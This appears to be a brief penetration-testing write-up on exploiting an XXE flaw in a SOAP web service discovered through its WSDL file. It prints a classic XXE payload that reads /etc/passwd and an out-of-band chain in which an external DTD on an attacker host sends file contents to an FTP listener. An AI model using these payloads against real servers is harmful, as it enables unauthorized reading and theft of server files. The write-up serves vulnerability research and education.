While registering for an application, The assessment team identified wsdl file such as:
/services/ApiService?wsdl
We have used wsdler burp extension (https://portswigger.net/bappstore/594a49bb233748f2bc80a9eb18a2e08f) to parse the wsdl file as shown in below image:
Now, We sent this request to repeater and started fuzzing it for XXE. Firstly, we have started with Classic XXE payloads such as:
<?xml version=”1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM “file:///etc/passwd”>]>
<data>&file;</data>
As you can see, from above two responses we can confirm the existence of vulnerability, but we can only enumerate file from server.
In order to extract the content of file, we need to emulate FTP-server.
We setup an xxe.dtd file on my server with following payload:
<!ENTITY % d SYSTEM “file:///etc/passwd”>
<!ENTITY % c “<!ENTITY rrr SYSTEM ‘ftp://x.x.x.x:2121/%d;'>">
Download and run the emulated ftp server from following link(Make sure about Port to listen):
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>
As soon as you run the vulnerable request, you will start receiving content of /etc/passwd file on emulated FTP server as shown in below screenshot:
References:
Comments